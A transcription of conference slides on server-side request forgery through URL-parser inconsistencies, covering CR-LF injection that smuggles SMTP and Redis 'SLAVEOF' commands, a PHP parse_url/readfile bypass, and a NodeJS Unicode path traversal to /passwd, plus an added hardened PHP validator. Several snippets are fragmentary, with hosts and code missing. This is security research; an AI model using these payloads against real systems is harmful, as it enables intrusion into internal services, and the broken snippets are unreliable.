Transcription of A New Era of SSRF - Exploiting URL Parser in Trending ...
1 A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!
Orange Tsai, Taiwan

About Orange Tsai
- The most professional red team in Taiwan
- The largest hacker conference in Taiwan, founded by Orange Tsai
- Speaker - speaker at several security conferences: HITCON, WooYun, AVTokyo
- CTFer - CTFs we won as champions / reached the finals of (as team HITCON): DEFCON, Codegate, Boston Key Party, HITB, Seccon, 0CTF, WCTF
- Bounty Hunter - vendors I have found Remote Code Execution in: Facebook, GitHub, Uber, Apple, Yahoo, Imgur

Agenda
- Introduction
- Make SSRF great again
- Issues that lead to SSRF bypass
- Issues that lead to protocol smuggling
- Case studies and demos
- Mitigations

What is SSRF?

2 Server Side Request Forgery
- Bypass firewall, touch the intranet
- Compromise internal services: Struts2, Redis, Elastic

Protocol Smuggling in SSRF
- Make SSRF more powerful
- Protocols that are suitable to smuggle:
  - HTTP-based protocols: Elastic, CouchDB, MongoDB, Docker
  - Text-based protocols: FTP, SMTP, Redis, Memcached

Quick Fun Example: Python is so hard

Quick Fun Example: CR-LF Injection on the HTTP protocol - smuggling the SMTP protocol over HTTP
  :25/%0D%0AHELO
  >> GET /
  << 421 ubuntu Rejecting open proxy localhost [ ]
  >> HELO
  closed

SMTP hates the HTTP protocol. It seems unexploitable.
Gopher is good. What if there is no Gopher support?
3 HTTPS
What won't be encrypted in a SSL handshake?

Quick Fun Example: CR-LF Injection on the HTTPS protocol - Exploit the Unexploitable - smuggling SMTP over the TLS SNI
  %0D%0AHELO :25/
  $ tcpdump -ilo -qw- tcp port 25 | xxd
  (the captured ClientHello on port 25 carries the injected SMTP commands inside the SNI field)

5 Quick Fun Example: CR-LF Injection on the HTTPS protocol - Exploit the Unexploitable - smuggling SMTP over the TLS SNI
  %0D% :25/
  $ tcpdump -ilo -qw- tcp port 25
  >> [binary ClientHello bytes]
  << 500 Command unrecognized: [binary ClientHello bytes]
  >> HELO
  << 250 ubuntu Hello localhost [ ], please meet you
  >> MAIL FROM:
  << Sender ok

Make SSRF Great Again
URL Parsing Issues
- It's all about the inconsistency between the URL parser and the requester
- Why is validating a URL hard? URLs are defined in RFC 2396 and RFC 3986, and a contemporary implementation based on the RFC has been defined, but different languages still have their own implementations

6 URL Components (RFC 3986)
  :8042/over/there?name=bar#nose
  - scheme: we only care about HTTP and HTTPS
  - authority: it's complicated
  - path: it's complicated
  - query: I don't care
  - fragment: I don't care

Big Picture (libraries vs. vulnerability classes)
  Vulnerability classes: CR-LF Injection (Path, Host/SNI); URL Parsing (Port Injection, Host Injection, Path Injection)
  Libraries: Python httplib, Python urllib, Python urllib2, Ruby Net::HTTP, Java net.URL, Perl LWP, NodeJS http, PHP http_wrapper, Wget, cURL

7 Consider the following PHP code:

  $url = 'http://' . $_GET['url'];
  $parsed = parse_url($url);
  if ($parsed['port'] == 80 && $parsed['host'] == ' ') {
      readfile($url);
  } else {
      die('You Shall Not Pass');
  }

Abusing URL Parsers
  :11211:80/
  PHP readfile vs. PHP parse_url
  Perl LWP vs. Perl URI

Abusing URL Parsers - RFC 3986
  authority   = [ userinfo "@" ] host [ ":" port ]
  port        = *DIGIT
  host        = IP-literal / IPv4address / reg-name
  reg-name    = *( unreserved / pct-encoded / sub-delims )
  unreserved  = ALPHA / DIGIT / "-" / "." / "_" / "~"
  sub-delims  = "!" / "$" / "&" / "'" / "(" / ")" / "*" / "+" / "," / ";" / "="

8 Abusing URL Parsers
  PHP parse_url vs. PHP readfile

Abusing URL Parsers
- Several programming languages suffered from this issue: cURL, PHP, Python
- RFC 3986: the authority component is preceded by a double slash ("//") and is terminated by the next slash ("/"), question mark ("?"), or number sign ("#") character, or by the end of the URI

How about URL parsers?

Abusing URL Parsers
  cURL/libcurl, PHP parse_url, Perl URI, Ruby uri, Ruby addressable, NodeJS url, Java net.URL, Python urlparse, Go net/url
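The PHP snippet above validates with parse_url() but hands the raw string to readfile(), whose own parser may split the authority differently. As an added example (not code from the slides), here is a hardened version that validates the parsed components and then fetches a URL rebuilt only from them, so the requester never sees anything the validator did not check. The allowed host "example.com" and port 80 are assumed placeholders.

```php
<?php
// Added example, not from the slides. Assumed allowlist (placeholders):
const ALLOWED_HOST = 'example.com';
const ALLOWED_PORT = 80;

/**
 * Validate a user-supplied URL with parse_url() and return a URL rebuilt
 * from the validated components, or null if it is rejected.
 * Fetching the rebuilt string instead of the raw input removes the gap
 * between parse_url() and the HTTP wrapper's parser (e.g. "host:11211:80").
 */
function safe_url(string $input): ?string {
    $parsed = parse_url('http://' . $input);
    if ($parsed === false) {
        return null;                           // parse_url() refused it
    }
    // A plain fetch needs no credentials or fragment; reject them outright.
    foreach (['user', 'pass', 'fragment'] as $k) {
        if (isset($parsed[$k])) {
            return null;
        }
    }
    $host = $parsed['host'] ?? '';
    $port = $parsed['port'] ?? 80;             // parse_url() gives an int
    // Only RFC 3986 reg-name characters: no ':' or whitespace can survive.
    if (!preg_match('/^[A-Za-z0-9.\-_~!$&\'()*+,;=%]+$/', $host)) {
        return null;
    }
    // Exact (case-insensitive) host match and a strict integer port check.
    if (strcasecmp($host, ALLOWED_HOST) !== 0 || $port !== ALLOWED_PORT) {
        return null;
    }
    $path  = $parsed['path'] ?? '/';
    $query = isset($parsed['query']) ? '?' . $parsed['query'] : '';
    // Refuse raw control characters and spaces in what goes on the wire,
    // which closes the CR-LF injection variant as well.
    if (preg_match('/[\x00-\x20]/', $path . $query)) {
        return null;
    }
    // Rebuild from validated parts; this string is the only thing fetched.
    return 'http://' . $host . ':' . $port . $path . $query;
}

$url = safe_url($_GET['url'] ?? '');
if ($url === null) {
    die('You Shall Not Pass');
}
readfile($url);
```

Resolving the host and rejecting private address ranges before the fetch is a separate mitigation this block does not include.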
9 Report the bug to the cURL team and get a patch quickly
Bypass the patch with a space

Abusing URL Parsers Again
"curl doesn't verify that the URL is 100% syntactically correct. It is instead documented to work with URLs and sort of assumes that you pass it correct input"
Won't Fix

But the previous patch still applies to the following NodeJS code

NodeJS Unicode Failure
  var base = " ";
  var path = ;
  if ( ("..") == -1) {
      (base + path, callback);
  }

NodeJS Unicode Failure
  /passwd
  \xFF\x2E\xFF\x2E/passwd
  \xFF\x2E\xFF\x2E/passwd
  new / (in NodeJS HTTP)
  U+FF2E: Full width Latin capital letter N
  What the ____

10 NodeJS Unicode Failure
- The HTTP module prevents requests from CR-LF Injection
- Encode the new-lines as URL encoding:
  :6379/\r\nSLAVEOF 6379\r\n
  $ nc -vvlp 6379
  >> GET /%0D%0ASLAVEOF%
  >> Host: :6379
  >> Connection: close
- Break the protections with Unicode U+FF0D U+FF0:
  :6379/ SLAVEOF 6379
  $ nc -vvlp 6379
  >> GET /
  >> SLAVEOF 6379
  >>
  >> Host: :6379
  >> Connection: close

GLibc NSS Features
In the Glibc source code, file #ns_name_pton():
  /*%
   * Convert an ascii string into an encoded domain name as per RFC1035.